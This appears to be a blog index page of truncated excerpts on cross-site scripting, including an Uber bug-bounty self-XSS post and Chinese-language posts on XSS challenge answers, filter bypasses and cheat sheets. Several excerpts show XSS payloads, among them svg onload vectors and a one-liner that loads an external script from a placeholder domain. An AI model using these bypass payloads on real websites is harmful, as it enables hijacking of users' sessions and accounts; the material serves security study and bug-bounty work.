Uber Bug Bounty: Turning Self-XSS into Good-XSS

Uber Bug Bounty: Turning Self-XSS into Good-XSS
Now that the Uber bug bounty programme has launched publicly, I can publish some of my favourite submissions, which I’ve been itching to do over the past year. This is part one of maybe two or three posts. On Uber’s Partners portal, where Drivers can login and update their details, I found a very simple, classic XSS: changing the value of one of...

XSS挑战赛 的xss知识点及答案

XSS挑战赛 的xss知识点及答案
M师傅语录: 题目很多围绕着security header来出题,希望开发者重视这些问题,在防御上,正确的设置下面的值,是能够避免很多问题. content-type、x-xss-protection、x-frame-options、x-content-type-options 1. 文件上传 <?php header("X-XSS-Protection: 0"); $target_dir = "uploads/"; $target_file = $target_dir . basename($_FILES[&...

密码保护:基于位置的有效XSS攻击代码

密码保护:基于位置的有效XSS攻击代码
在研究的方式来逃避过滤,检测并阻止在有效载荷中的圆括号存在XSS的尝试,我来到这,将共享这一岗位及其随后的部分问题的有趣的解决方案。 值得注意的是,对被禁止字符的任何编码都不会回避过滤器。 为了实现这一点,我开始使用JavaScript文档位置属性,它使下面的原始有效负载成为可能,但还没有准备好逃避: 1 <svg/onload=location='javascript:alert(1)'><svg...

密码保护:超强绕过XSS的方法

密码保护:超强绕过XSS的方法
如XSSer(一个让XSS)可能知道,脚本标签并不总是能注入一个XSS漏洞是因为它将由开发商或一个WAF过滤后的第一件事(Web应用防火墙)。此外,输入可能仅限于几个字符,这使得在事件处理程序中不可能放置调用外部脚本所需的下列JavaScript代码,例如: 1 with(document)body.appendChild(createElement('script')).src='//DOMAIN'with(document)body.appendChild(createElemen...

弹窗小姿势锦集

弹窗小姿势锦集
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 <script>prompt(1)</script...

密码保护:XSS Cheat Sheet

密码保护:XSS Cheat Sheet
本文有一个重点需要GET到。 Technique Vector/Payload * * In URLs: & => %26 ,  # => %23 ,  + => %2B HTML Context Tag Injection <svg onload=alert(1...